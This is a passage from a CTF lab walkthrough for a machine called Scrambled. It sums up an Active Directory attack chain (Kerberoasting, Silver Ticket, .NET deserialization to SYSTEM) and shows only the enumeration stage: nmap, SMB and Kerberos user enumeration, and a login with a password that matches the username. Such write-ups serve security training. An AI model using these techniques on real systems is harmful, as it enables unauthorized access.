Overview
The machine starts by web enumeration that leaks two usernames, one of which uses its name as password, granting SMB access and a public share with a PDF hinting at a compromised SQL account, Kerberoasting the sqlsvc SPN cracks its hash, and since NTLM is disabled we forge a Silver Ticket to authenticate to MSSQL as administrator, query the ScrambleHR database to recover plaintext credentials for miscsvc, and winrm in for user. A .NET sales client found in the IT share reveals a BinaryFormatter deserialization sink on port 4411, so we craft a WindowsIdentity gadget chain payload and upload it to get RCE as NT SYSTEM.
Enumeration
as usual we'll start with nmap scan
┌─[]─[10.10.16.83]─[jimmex@attacker]─[~/htb/labs/scrambled]
└──╼ [★]$ nmap -sC -sV -vv -oA init 10.129.12.119
Starting Nmap 7.94SVN ( https://nmap.org ) at 2026-06-11 04:22 PDT
NSE: Loaded 156 scripts for scanning.
NSE: Script Pre-scanning.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 04:22
Completed NSE at 04:22, 0.00s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 04:22
Completed NSE at 04:22, 0.00s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 04:22
Completed NSE at 04:22, 0.00s elapsed
Initiating Ping Scan at 04:22
Scanning 10.129.12.119 [2 ports]
Completed Ping Scan at 04:22, 0.08s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 04:22
Completed Parallel DNS resolution of 1 host. at 04:22, 0.10s elapsed
Initiating Connect Scan at 04:22
Scanning 10.129.12.119 [1000 ports]
Discovered open port 135/tcp on 10.129.12.119
Discovered open port 139/tcp on 10.129.12.119
Discovered open port 80/tcp on 10.129.12.119
Discovered open port 445/tcp on 10.129.12.119
Discovered open port 53/tcp on 10.129.12.119
Discovered open port 88/tcp on 10.129.12.119
Discovered open port 3268/tcp on 10.129.12.119
Discovered open port 464/tcp on 10.129.12.119
Discovered open port 636/tcp on 10.129.12.119
Discovered open port 3269/tcp on 10.129.12.119
Discovered open port 389/tcp on 10.129.12.119
Discovered open port 593/tcp on 10.129.12.119
Discovered open port 1433/tcp on 10.129.12.119
Completed Connect Scan at 04:22, 9.73s elapsed (1000 total ports)
Initiating Service scan at 04:22
Scanning 13 services on 10.129.12.119
Completed Service scan at 04:23, 48.69s elapsed (13 services on 1 host)
NSE: Script scanning 10.129.12.119.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 04:23
NSE Timing: About 99.94% done; ETC: 04:23 (0:00:00 remaining)
Completed NSE at 04:23, 40.11s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 04:23
Completed NSE at 04:24, 3.90s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 04:24
Completed NSE at 04:24, 0.01s elapsed
Nmap scan report for 10.129.12.119
Host is up, received syn-ack (0.12s latency).
Scanned at 2026-06-11 04:22:18 PDT for 103s
Not shown: 987 filtered tcp ports (no-response)
PORT STATE SERVICE REASON VERSION
53/tcp open domain syn-ack Simple DNS Plus
80/tcp open http syn-ack Microsoft IIS httpd 10.0
| http-methods:
| Supported Methods: OPTIONS TRACE GET HEAD POST
| _ Potentially risky methods: TRACE
| _http-server-header: Microsoft-IIS/10.0
| _http-title: Scramble Corp Intranet
88/tcp open kerberos-sec syn-ack Microsoft Windows Kerberos (server time: 2026-06-11 11:22:34Z)
135/tcp open msrpc syn-ack Microsoft Windows RPC
139/tcp open netbios-ssn syn-ack Microsoft Windows netbios-ssn
389/tcp open ldap syn-ack Microsoft Windows Active Directory LDAP (Domain: scrm.local0., Site: Default-First-Site-Name)
| ssl-cert: Subject:
| Subject Alternative Name: DNS:DC1.scrm.local
| Issuer: commonName=scrm-DC1-CA/domainComponent=scrm
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha1WithRSAEncryption
| Not valid before: 2024-09-04T11:14:45
| Not valid after: 2121-06-08T22:39:53
| MD5: 2ca2:5511:c96e:d5c5:3601:17f2:c316:7ea3
| SHA-1: 9532:78bb:e082:70b2:5f2e:7467:6f7d:a61d:1918:685e
| -----BEGIN CERTIFICATE-----
| MIIFtzCCBJ+gAwIBAgITEgAAAAWd33nJkSGX4QAAAAAABTANBgkqhkiG9w0BAQUF
| ADBDMRUwEwYKCZImiZPyLGQBGRYFbG9jYWwxFDASBgoJkiaJk/IsZAEZFgRzY3Jt
| MRQwEgYDVQQDEwtzY3JtLURDMS1DQTAgFw0yNDA5MDQxMTE0NDVaGA8yMTIxMDYw
| ODIyMzk1M1owADCCASIwDQYJKoZIhvcNAQEBBQADggEPADCCAQoCggEBAL7APeOI
| QpFcy0JhCXiFe+YukkzyogwrXQG4jwuUqVtnzI0qKsJ2HKdvOLp5W+Fc4RwFdNMU
| q3cVCiwRMDdgsZbDull+e8s8kNmdBNNqcaHFwKXYbdWiXR2aBysPf9Gzs3iWllhs
| Ja1ihbrArixe2471/rjohLiz8VVssVQqUm8KjcO/jRFOLd2y1MtQPoOhTQtDasFT
| SceuhHLAe7RHygnndnyo2Sb+O0Neaeq0YDdc9zU5yjGilpJUYKYB36z32IOfEdJ8
| OJr1iqg9oFZ0KKqskm5YT6PhFZFwpSAn4Re8xTfBOglopFn/mEBTh7ibLXL25K5/
| H4ve2hiQIPsD0rECAwEAAaOCAuMwggLfMDYGCSsGAQQBgjcVBwQpMCcGHysGAQQB
| gjcVCIaj2B2B69kvgd2ZGYSm9EaL4D9SARwCAW4CAQIwKQYDVR0lBCIwIAYIKwYB
| BQUHAwIGCCsGAQUFBwMBBgorBgEEAYI3FAICMA4GA1UdDwEB/wQEAwIFoDA1Bgkr
| BgEEAYI3FQoEKDAmMAoGCCsGAQUFBwMCMAoGCCsGAQUFBwMBMAwGCisGAQQBgjcU
| AgIwHQYDVR0OBBYEFBRGx6zDOGOtjPPvaoLO36fByJ5LMB8GA1UdIwQYMBaAFAhp
| QhkKLZ9wcDY0RhznHYYVm2iSMIHEBgNVHR8EgbwwgbkwgbaggbOggbCGga1sZGFw
| Oi8vL0NOPXNjcm0tREMxLUNBLENOPURDMSxDTj1DRFAsQ049UHVibGljJTIwS2V5
| JTIwU2VydmljZXMsQ049U2VydmljZXMsQ049Q29uZmlndXJhdGlvbixEQz1zY3Jt
| LERDPWxvY2FsP2NlcnRpZmljYXRlUmV2b2NhdGlvbkxpc3Q/YmFzZT9vYmplY3RD
| bGFzcz1jUkxEaXN0cmlidXRpb25Qb2ludDCBvAYIKwYBBQUHAQEEga8wgawwgakG
| CCsGAQUFBzAChoGcbGRhcDovLy9DTj1zY3JtLURDMS1DQSxDTj1BSUEsQ049UHVi
| bGljJTIwS2V5JTIwU2VydmljZXMsQ049U2VydmljZXMsQ049Q29uZmlndXJhdGlv
| bixEQz1zY3JtLERDPWxvY2FsP2NBQ2VydGlmaWNhdGU/YmFzZT9vYmplY3RDbGFz
| cz1jZXJ0aWZpY2F0aW9uQXV0aG9yaXR5MBwGA1UdEQEB/wQSMBCCDkRDMS5zY3Jt
| LmxvY2FsME8GCSsGAQQBgjcZAgRCMECgPgYKKwYBBAGCNxkCAaAwBC5TLTEtNS0y
| MS0yNzQzMjA3MDQ1LTE4Mjc4MzExMDUtMjU0MjUyMzIwMC0xMDAwMA0GCSqGSIb3
| DQEBBQUAA4IBAQCecGFCSZW5yaXkTpXR5b09rpGBFyLSOJeS0Hv1LBmeN040mUXr
| 9wydqlVd1jPt2HbiMA07ftoR3LnCZYEOppSK+yX4GePev04aFRbFAunUDPvzC1FI
| 0Tqrh9/DSW0Zuqsmp6k34B5MSiYYfgSqtF4qdYQ4FyuxqoBft89+C+T65e5Io6Yu
| BAdyMGJqohUMGPxk3hzRQV5MqikqS/Ffj27YnqbBXivAr0W1RkytDHdsdqus9iNr
| EdMfkFzdSxBppaS59c+x289sotNYT0gTywBX86QDyP+TEFZgPqX5pQVuazo1HOyC
| 41E5cc4R5EyAhM/olViiJa5w/LrKFa7oEgec
| _-----END CERTIFICATE-----
| _ssl-date: 2026-06-11T11:23:57+00:00; 0s from scanner time.
445/tcp open microsoft-ds? syn-ack
464/tcp open kpasswd5? syn-ack
593/tcp open ncacn_http syn-ack Microsoft Windows RPC over HTTP 1.0
636/tcp open ssl/ldap syn-ack Microsoft Windows Active Directory LDAP (Domain: scrm.local0., Site: Default-First-Site-Name)
| _ssl-date: 2026-06-11T11:23:57+00:00; 0s from scanner time.
| ssl-cert: Subject:
| Subject Alternative Name: DNS:DC1.scrm.local
| Issuer: commonName=scrm-DC1-CA/domainComponent=scrm
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha1WithRSAEncryption
| Not valid before: 2024-09-04T11:14:45
| Not valid after: 2121-06-08T22:39:53
| MD5: 2ca2:5511:c96e:d5c5:3601:17f2:c316:7ea3
| SHA-1: 9532:78bb:e082:70b2:5f2e:7467:6f7d:a61d:1918:685e
| -----BEGIN CERTIFICATE-----
| MIIFtzCCBJ+gAwIBAgITEgAAAAWd33nJkSGX4QAAAAAABTANBgkqhkiG9w0BAQUF
| ADBDMRUwEwYKCZImiZPyLGQBGRYFbG9jYWwxFDASBgoJkiaJk/IsZAEZFgRzY3Jt
| MRQwEgYDVQQDEwtzY3JtLURDMS1DQTAgFw0yNDA5MDQxMTE0NDVaGA8yMTIxMDYw
| ODIyMzk1M1owADCCASIwDQYJKoZIhvcNAQEBBQADggEPADCCAQoCggEBAL7APeOI
| QpFcy0JhCXiFe+YukkzyogwrXQG4jwuUqVtnzI0qKsJ2HKdvOLp5W+Fc4RwFdNMU
| q3cVCiwRMDdgsZbDull+e8s8kNmdBNNqcaHFwKXYbdWiXR2aBysPf9Gzs3iWllhs
| Ja1ihbrArixe2471/rjohLiz8VVssVQqUm8KjcO/jRFOLd2y1MtQPoOhTQtDasFT
| SceuhHLAe7RHygnndnyo2Sb+O0Neaeq0YDdc9zU5yjGilpJUYKYB36z32IOfEdJ8
| OJr1iqg9oFZ0KKqskm5YT6PhFZFwpSAn4Re8xTfBOglopFn/mEBTh7ibLXL25K5/
| H4ve2hiQIPsD0rECAwEAAaOCAuMwggLfMDYGCSsGAQQBgjcVBwQpMCcGHysGAQQB
| gjcVCIaj2B2B69kvgd2ZGYSm9EaL4D9SARwCAW4CAQIwKQYDVR0lBCIwIAYIKwYB
| BQUHAwIGCCsGAQUFBwMBBgorBgEEAYI3FAICMA4GA1UdDwEB/wQEAwIFoDA1Bgkr
| BgEEAYI3FQoEKDAmMAoGCCsGAQUFBwMCMAoGCCsGAQUFBwMBMAwGCisGAQQBgjcU
| AgIwHQYDVR0OBBYEFBRGx6zDOGOtjPPvaoLO36fByJ5LMB8GA1UdIwQYMBaAFAhp
| QhkKLZ9wcDY0RhznHYYVm2iSMIHEBgNVHR8EgbwwgbkwgbaggbOggbCGga1sZGFw
| Oi8vL0NOPXNjcm0tREMxLUNBLENOPURDMSxDTj1DRFAsQ049UHVibGljJTIwS2V5
| JTIwU2VydmljZXMsQ049U2VydmljZXMsQ049Q29uZmlndXJhdGlvbixEQz1zY3Jt
| LERDPWxvY2FsP2NlcnRpZmljYXRlUmV2b2NhdGlvbkxpc3Q/YmFzZT9vYmplY3RD
| bGFzcz1jUkxEaXN0cmlidXRpb25Qb2ludDCBvAYIKwYBBQUHAQEEga8wgawwgakG
| CCsGAQUFBzAChoGcbGRhcDovLy9DTj1zY3JtLURDMS1DQSxDTj1BSUEsQ049UHVi
| bGljJTIwS2V5JTIwU2VydmljZXMsQ049U2VydmljZXMsQ049Q29uZmlndXJhdGlv
| bixEQz1zY3JtLERDPWxvY2FsP2NBQ2VydGlmaWNhdGU/YmFzZT9vYmplY3RDbGFz
| cz1jZXJ0aWZpY2F0aW9uQXV0aG9yaXR5MBwGA1UdEQEB/wQSMBCCDkRDMS5zY3Jt
| LmxvY2FsME8GCSsGAQQBgjcZAgRCMECgPgYKKwYBBAGCNxkCAaAwBC5TLTEtNS0y
| MS0yNzQzMjA3MDQ1LTE4Mjc4MzExMDUtMjU0MjUyMzIwMC0xMDAwMA0GCSqGSIb3
| DQEBBQUAA4IBAQCecGFCSZW5yaXkTpXR5b09rpGBFyLSOJeS0Hv1LBmeN040mUXr
| 9wydqlVd1jPt2HbiMA07ftoR3LnCZYEOppSK+yX4GePev04aFRbFAunUDPvzC1FI
| 0Tqrh9/DSW0Zuqsmp6k34B5MSiYYfgSqtF4qdYQ4FyuxqoBft89+C+T65e5Io6Yu
| BAdyMGJqohUMGPxk3hzRQV5MqikqS/Ffj27YnqbBXivAr0W1RkytDHdsdqus9iNr
| EdMfkFzdSxBppaS59c+x289sotNYT0gTywBX86QDyP+TEFZgPqX5pQVuazo1HOyC
| 41E5cc4R5EyAhM/olViiJa5w/LrKFa7oEgec
| _-----END CERTIFICATE-----
1433/tcp open ms-sql-s syn-ack Microsoft SQL Server 2019 15.00.2000.00; RTM
| _ms-sql-ntlm-info: ERROR: Script execution failed (use -d to debug)
| _ms-sql-info: ERROR: Script execution failed (use -d to debug)
| ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback
| Issuer: commonName=SSL_Self_Signed_Fallback
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2026-06-11T11:18:57
| Not valid after: 2056-06-11T11:18:57
| MD5: 600b:fc04:88ba:fd1a:cae9:6068:d112:c707
| SHA-1: f655:3d0e:434c:643c:a3a7:d500:0dac:9121:de4c:b2bc
| -----BEGIN CERTIFICATE-----
| MIIDADCCAeigAwIBAgIQI6oqk/qHr4tE/i4tmHO0wjANBgkqhkiG9w0BAQsFADA7
| MTkwNwYDVQQDHjAAUwBTAEwAXwBTAGUAbABmAF8AUwBpAGcAbgBlAGQAXwBGAGEA
| bABsAGIAYQBjAGswIBcNMjYwNjExMTExODU3WhgPMjA1NjA2MTExMTE4NTdaMDsx
| OTA3BgNVBAMeMABTAFMATABfAFMAZQBsAGYAXwBTAGkAZwBuAGUAZABfAEYAYQBs
| AGwAYgBhAGMAazCCASIwDQYJKoZIhvcNAQEBBQADggEPADCCAQoCggEBAPNezMjF
| /uVsZfk1wIbbX3BMeEC48nlVjt0MV2GUWiW84p4My3NeGJ6H+skbZDnxwqgNuLdI
| 2jV+yjuD+u9ueg8dFsvIvSQ7QeeQNRqzylz15Ib6f/YJCV9kmOItFTP0pAF6nwvN
| nM6/JtA8qnAV+d2EnPi1Zu98Z+60IOOmI+BTjVC7Sd1oLZd8RFzeC1y7XrR8I5yO
| AXlltqUnVpQNci8mC7usTpXvLNG5sQZl2xN6ApgaVsre0oCkGEQJbocFMYEEFWu7
| aXsWu31kc/nYVsvTXqrNPycmObqz8AtWBqkoKmsKPTDEz0efpZyQ+b+aKVRlROgS
| k40U1kJMCyY5rMkCAwEAATANBgkqhkiG9w0BAQsFAAOCAQEAyVi48OAxwEOo2yzC
| /wqKNZLQh66YBdHlXrwtyfTt/D5Dlw6z7Y1U6rzwr3x5iQGPYZQ5gQWIjwDF6/wM
| QGSRBYwCVI89iogF88kloFGdVHRB/QHYqxwV8ioinPme09YbMeSDYtcfcl/GDFLE
| uloEfkfgWtWQkDabOTC2KFkxefZabkoBkO9idO9sX8dma2H4tK+abgH6anJXFOdg
| KxkiNIWFe2MbXrkJaXydwLXYt02wt7ZojPkUhB8zw/pppafCIagobj3Rn0W8FwPf
| P7Mouh0sGIcUoylFlVfFdVo0z65o1nhkSckXF4QF46hnFBTKFSVG2RYSWllhaBvA
| INVzlA==
| _-----END CERTIFICATE-----
| _ssl-date: 2026-06-11T11:23:57+00:00; 0s from scanner time.
3268/tcp open ldap syn-ack Microsoft Windows Active Directory LDAP (Domain: scrm.local0., Site: Default-First-Site-Name)
| ssl-cert: Subject:
| Subject Alternative Name: DNS:DC1.scrm.local
| Issuer: commonName=scrm-DC1-CA/domainComponent=scrm
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha1WithRSAEncryption
| Not valid before: 2024-09-04T11:14:45
| Not valid after: 2121-06-08T22:39:53
| MD5: 2ca2:5511:c96e:d5c5:3601:17f2:c316:7ea3
| SHA-1: 9532:78bb:e082:70b2:5f2e:7467:6f7d:a61d:1918:685e
| -----BEGIN CERTIFICATE-----
| MIIFtzCCBJ+gAwIBAgITEgAAAAWd33nJkSGX4QAAAAAABTANBgkqhkiG9w0BAQUF
| ADBDMRUwEwYKCZImiZPyLGQBGRYFbG9jYWwxFDASBgoJkiaJk/IsZAEZFgRzY3Jt
| MRQwEgYDVQQDEwtzY3JtLURDMS1DQTAgFw0yNDA5MDQxMTE0NDVaGA8yMTIxMDYw
| ODIyMzk1M1owADCCASIwDQYJKoZIhvcNAQEBBQADggEPADCCAQoCggEBAL7APeOI
| QpFcy0JhCXiFe+YukkzyogwrXQG4jwuUqVtnzI0qKsJ2HKdvOLp5W+Fc4RwFdNMU
| q3cVCiwRMDdgsZbDull+e8s8kNmdBNNqcaHFwKXYbdWiXR2aBysPf9Gzs3iWllhs
| Ja1ihbrArixe2471/rjohLiz8VVssVQqUm8KjcO/jRFOLd2y1MtQPoOhTQtDasFT
| SceuhHLAe7RHygnndnyo2Sb+O0Neaeq0YDdc9zU5yjGilpJUYKYB36z32IOfEdJ8
| OJr1iqg9oFZ0KKqskm5YT6PhFZFwpSAn4Re8xTfBOglopFn/mEBTh7ibLXL25K5/
| H4ve2hiQIPsD0rECAwEAAaOCAuMwggLfMDYGCSsGAQQBgjcVBwQpMCcGHysGAQQB
| gjcVCIaj2B2B69kvgd2ZGYSm9EaL4D9SARwCAW4CAQIwKQYDVR0lBCIwIAYIKwYB
| BQUHAwIGCCsGAQUFBwMBBgorBgEEAYI3FAICMA4GA1UdDwEB/wQEAwIFoDA1Bgkr
| BgEEAYI3FQoEKDAmMAoGCCsGAQUFBwMCMAoGCCsGAQUFBwMBMAwGCisGAQQBgjcU
| AgIwHQYDVR0OBBYEFBRGx6zDOGOtjPPvaoLO36fByJ5LMB8GA1UdIwQYMBaAFAhp
| QhkKLZ9wcDY0RhznHYYVm2iSMIHEBgNVHR8EgbwwgbkwgbaggbOggbCGga1sZGFw
| Oi8vL0NOPXNjcm0tREMxLUNBLENOPURDMSxDTj1DRFAsQ049UHVibGljJTIwS2V5
| JTIwU2VydmljZXMsQ049U2VydmljZXMsQ049Q29uZmlndXJhdGlvbixEQz1zY3Jt
| LERDPWxvY2FsP2NlcnRpZmljYXRlUmV2b2NhdGlvbkxpc3Q/YmFzZT9vYmplY3RD
| bGFzcz1jUkxEaXN0cmlidXRpb25Qb2ludDCBvAYIKwYBBQUHAQEEga8wgawwgakG
| CCsGAQUFBzAChoGcbGRhcDovLy9DTj1zY3JtLURDMS1DQSxDTj1BSUEsQ049UHVi
| bGljJTIwS2V5JTIwU2VydmljZXMsQ049U2VydmljZXMsQ049Q29uZmlndXJhdGlv
| bixEQz1zY3JtLERDPWxvY2FsP2NBQ2VydGlmaWNhdGU/YmFzZT9vYmplY3RDbGFz
| cz1jZXJ0aWZpY2F0aW9uQXV0aG9yaXR5MBwGA1UdEQEB/wQSMBCCDkRDMS5zY3Jt
| LmxvY2FsME8GCSsGAQQBgjcZAgRCMECgPgYKKwYBBAGCNxkCAaAwBC5TLTEtNS0y
| MS0yNzQzMjA3MDQ1LTE4Mjc4MzExMDUtMjU0MjUyMzIwMC0xMDAwMA0GCSqGSIb3
| DQEBBQUAA4IBAQCecGFCSZW5yaXkTpXR5b09rpGBFyLSOJeS0Hv1LBmeN040mUXr
| 9wydqlVd1jPt2HbiMA07ftoR3LnCZYEOppSK+yX4GePev04aFRbFAunUDPvzC1FI
| 0Tqrh9/DSW0Zuqsmp6k34B5MSiYYfgSqtF4qdYQ4FyuxqoBft89+C+T65e5Io6Yu
| BAdyMGJqohUMGPxk3hzRQV5MqikqS/Ffj27YnqbBXivAr0W1RkytDHdsdqus9iNr
| EdMfkFzdSxBppaS59c+x289sotNYT0gTywBX86QDyP+TEFZgPqX5pQVuazo1HOyC
| 41E5cc4R5EyAhM/olViiJa5w/LrKFa7oEgec
| _-----END CERTIFICATE-----
| _ssl-date: 2026-06-11T11:23:57+00:00; 0s from scanner time.
3269/tcp open ssl/ldap syn-ack Microsoft Windows Active Directory LDAP (Domain: scrm.local0., Site: Default-First-Site-Name)
| ssl-cert: Subject:
| Subject Alternative Name: DNS:DC1.scrm.local
| Issuer: commonName=scrm-DC1-CA/domainComponent=scrm
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha1WithRSAEncryption
| Not valid before: 2024-09-04T11:14:45
| Not valid after: 2121-06-08T22:39:53
| MD5: 2ca2:5511:c96e:d5c5:3601:17f2:c316:7ea3
| SHA-1: 9532:78bb:e082:70b2:5f2e:7467:6f7d:a61d:1918:685e
| -----BEGIN CERTIFICATE-----
| MIIFtzCCBJ+gAwIBAgITEgAAAAWd33nJkSGX4QAAAAAABTANBgkqhkiG9w0BAQUF
| ADBDMRUwEwYKCZImiZPyLGQBGRYFbG9jYWwxFDASBgoJkiaJk/IsZAEZFgRzY3Jt
| MRQwEgYDVQQDEwtzY3JtLURDMS1DQTAgFw0yNDA5MDQxMTE0NDVaGA8yMTIxMDYw
| ODIyMzk1M1owADCCASIwDQYJKoZIhvcNAQEBBQADggEPADCCAQoCggEBAL7APeOI
| QpFcy0JhCXiFe+YukkzyogwrXQG4jwuUqVtnzI0qKsJ2HKdvOLp5W+Fc4RwFdNMU
| q3cVCiwRMDdgsZbDull+e8s8kNmdBNNqcaHFwKXYbdWiXR2aBysPf9Gzs3iWllhs
| Ja1ihbrArixe2471/rjohLiz8VVssVQqUm8KjcO/jRFOLd2y1MtQPoOhTQtDasFT
| SceuhHLAe7RHygnndnyo2Sb+O0Neaeq0YDdc9zU5yjGilpJUYKYB36z32IOfEdJ8
| OJr1iqg9oFZ0KKqskm5YT6PhFZFwpSAn4Re8xTfBOglopFn/mEBTh7ibLXL25K5/
| H4ve2hiQIPsD0rECAwEAAaOCAuMwggLfMDYGCSsGAQQBgjcVBwQpMCcGHysGAQQB
| gjcVCIaj2B2B69kvgd2ZGYSm9EaL4D9SARwCAW4CAQIwKQYDVR0lBCIwIAYIKwYB
| BQUHAwIGCCsGAQUFBwMBBgorBgEEAYI3FAICMA4GA1UdDwEB/wQEAwIFoDA1Bgkr
| BgEEAYI3FQoEKDAmMAoGCCsGAQUFBwMCMAoGCCsGAQUFBwMBMAwGCisGAQQBgjcU
| AgIwHQYDVR0OBBYEFBRGx6zDOGOtjPPvaoLO36fByJ5LMB8GA1UdIwQYMBaAFAhp
| QhkKLZ9wcDY0RhznHYYVm2iSMIHEBgNVHR8EgbwwgbkwgbaggbOggbCGga1sZGFw
| Oi8vL0NOPXNjcm0tREMxLUNBLENOPURDMSxDTj1DRFAsQ049UHVibGljJTIwS2V5
| JTIwU2VydmljZXMsQ049U2VydmljZXMsQ049Q29uZmlndXJhdGlvbixEQz1zY3Jt
| LERDPWxvY2FsP2NlcnRpZmljYXRlUmV2b2NhdGlvbkxpc3Q/YmFzZT9vYmplY3RD
| bGFzcz1jUkxEaXN0cmlidXRpb25Qb2ludDCBvAYIKwYBBQUHAQEEga8wgawwgakG
| CCsGAQUFBzAChoGcbGRhcDovLy9DTj1zY3JtLURDMS1DQSxDTj1BSUEsQ049UHVi
| bGljJTIwS2V5JTIwU2VydmljZXMsQ049U2VydmljZXMsQ049Q29uZmlndXJhdGlv
| bixEQz1zY3JtLERDPWxvY2FsP2NBQ2VydGlmaWNhdGU/YmFzZT9vYmplY3RDbGFz
| cz1jZXJ0aWZpY2F0aW9uQXV0aG9yaXR5MBwGA1UdEQEB/wQSMBCCDkRDMS5zY3Jt
| LmxvY2FsME8GCSsGAQQBgjcZAgRCMECgPgYKKwYBBAGCNxkCAaAwBC5TLTEtNS0y
| MS0yNzQzMjA3MDQ1LTE4Mjc4MzExMDUtMjU0MjUyMzIwMC0xMDAwMA0GCSqGSIb3
| DQEBBQUAA4IBAQCecGFCSZW5yaXkTpXR5b09rpGBFyLSOJeS0Hv1LBmeN040mUXr
| 9wydqlVd1jPt2HbiMA07ftoR3LnCZYEOppSK+yX4GePev04aFRbFAunUDPvzC1FI
| 0Tqrh9/DSW0Zuqsmp6k34B5MSiYYfgSqtF4qdYQ4FyuxqoBft89+C+T65e5Io6Yu
| BAdyMGJqohUMGPxk3hzRQV5MqikqS/Ffj27YnqbBXivAr0W1RkytDHdsdqus9iNr
| EdMfkFzdSxBppaS59c+x289sotNYT0gTywBX86QDyP+TEFZgPqX5pQVuazo1HOyC
| 41E5cc4R5EyAhM/olViiJa5w/LrKFa7oEgec
| _-----END CERTIFICATE-----
| _ssl-date: 2026-06-11T11:23:57+00:00; 0s from scanner time.
Service Info: Host: DC1; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| p2p-conficker:
| Checking for Conficker.C or higher...
| Check 1 (port 43729/tcp): CLEAN (Timeout)
| Check 2 (port 45461/tcp): CLEAN (Timeout)
| Check 3 (port 28441/udp): CLEAN (Timeout)
| Check 4 (port 29483/udp): CLEAN (Timeout)
| _ 0/4 checks are positive: Host is CLEAN or ports are blocked
| smb2-time:
| date: 2026-06-11T11:23:21
| _ start_date: N/A
| _clock-skew: mean: 0s, deviation: 0s, median: 0s
| smb2-security-mode:
| 3:1:1:
| _ Message signing enabled and required
NSE: Script Post-scanning.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 04:24
Completed NSE at 04:24, 0.00s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 04:24
Completed NSE at 04:24, 0.00s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 04:24
Completed NSE at 04:24, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 103.44 seconds
┌─[]─[10.10.16.83]─[jimmex@attacker]─[~/htb/labs/scrambled]and we got DNS, HTTP running custom website with title Scramble Corp Intranet
- there is ADCS in place with the CA
scrm-DC1-CA - the domain name is
scrm.localand hostname isDC1so the FQDN isDC1.scrm.local - no clock skew
so add the hostname and FQDN and DN to your hosts file
┌─[]─[10.10.16.83]─[jimmex@attacker]─[~/htb/labs/scrambled]
└──╼ [★]$ echo '10.129.12.119 DC1 DC1.scrm.local scrm.local' | sudo tee -a /etc/hosts
10.129.12.119 DC1 DC1.scrm.local scrm.localtrying to list shares for the Guest account gor firstly status not supported cause NTLM not supported but even after -k option for Kerberos gets us error KDC_ERR_CLIENT_REVOKED which means the KDC rejected the authentication and there is multiple reasons for it, the most common one and what I expect here is that the Guest account is disabled
┌─[]─[10.10.16.83]─[jimmex@attacker]─[~/htb/labs/scrambled]
└──╼ [★]$ nxc smb 10.129.12.119 -u Guest -p '' --shares
SMB 10.129.12.119 445 DC1 [*] x64 (name:DC1) (domain:scrm.local) (signing:True) (SMBv1:None) (NTLM:False)
SMB 10.129.12.119 445 DC1 [-] scrm.local\Guest: STATUS_NOT_SUPPORTED
┌─[]─[10.10.16.83]─[jimmex@attacker]─[~/htb/labs/scrambled]
└──╼ [★]$ nxc smb 10.129.12.119 -u Guest -p '' --shares -k
SMB 10.129.12.119 445 DC1 [*] x64 (name:DC1) (domain:scrm.local) (signing:True) (SMBv1:None) (NTLM:False)
SMB 10.129.12.119 445 DC1 [-] scrm.local\Guest: KDC_ERR_CLIENT_REVOKEDand with no Guest account for SMB or null bind for LDAP (also failed), the only other way in is the web server running on the target
Website
and we got a website telling us about the NTLM being disabled for security issues and some links to other resources like creating new user account or requesting a password reset
this page instructing us about how to contact support and we got these two pieces of information that might become handy later which is that there is two possible usernames
- support
- ksimpson
another information that there is an app for orders running on port 4411
and we can connect to it but we don't know any commands that we can use so we'll keep that in mind for now
there is also this form to create a new user but it doesn't seem to be sending any kind of a request to the backend
and the password reset page has nothing
so for now i will start fuzzing the website for vhosts, directories and while this is running I'll start looking in this leaked usernames and if we can do something about them
ksimpson User
starting to look into this user we get that it is actually valid but it requires pre authentication so we can't do ASREP Roasting where we get a hash and crack it online
┌─[]─[10.10.16.83]─[jimmex@attacker]─[~/htb/labs/scrambled]
└──╼ [★]$ kerbrute userenum -d scrm.local --dc 10.129.12.119 usernames --downgrade
__ __ __
/ /_____ _____/ /_ _______ __/ /____
/ //_/ _ \/ ___/ __ \/ ___/ / / / __/ _ \
/ ,< / __/ / / /_/ / / / /_/ / /_/ __/
/_/|_|\___/_/ /_.___/_/ \__,_/\__/\___/
Version: dev (n/a) - 06/11/26 - Ronnie Flathers @ropnop
2026/06/11 05:04:02 > Using downgraded encryption: arcfour-hmac-md5
2026/06/11 05:04:02 > Using KDC(s):
2026/06/11 05:04:02 > 10.129.12.119:88
2026/06/11 05:04:02 > [+] VALID USERNAME: ksimpson@scrm.local
2026/06/11 05:04:02 > Done! Tested 2 usernames (1 valid) in 0.141 secondsand as you can see it actually has the username as password so we now got an account
┌─[]─[10.10.16.83]─[jimmex@attacker]─[~/htb/labs/scrambled]
└──╼ [★]$ nxc smb 10.129.12.119 -u ksimpson -p ksimpson -k
SMB 10.129.12.119 445 DC1 [*] x64 (name:DC1) (domain:scrm.local) (signing:True) (SMBv1:None) (NTLM:False)
SMB 10.129.12.119 445 DC1 [+] scrm.local\ksimpson:ksimpsonand there is two non-standard shares but we don't have access to them, yet we have access to the Public Share so lets take a look
┌─[]─[10.10.16.83]─[jimmex@attacker]─[~/htb/labs/scrambled]
└──╼ [★]$ nxc smb 10.129.12.119 -u ksimpson -p ksimpson -k --shares
SMB 10.129.12.119 445 DC1 [*] x64 (name:DC1) (domain:scrm.local) (signing:True) (SMBv1:None) (NTLM:False)
SMB 10.129.12.119 445 DC1 [+] scrm.local\ksimpson:ksimpson
SMB 10.129.12.119 445 DC1 [*] Enumerated shares
SMB 10.129.12.119 445 DC1 Share Permissions Remark
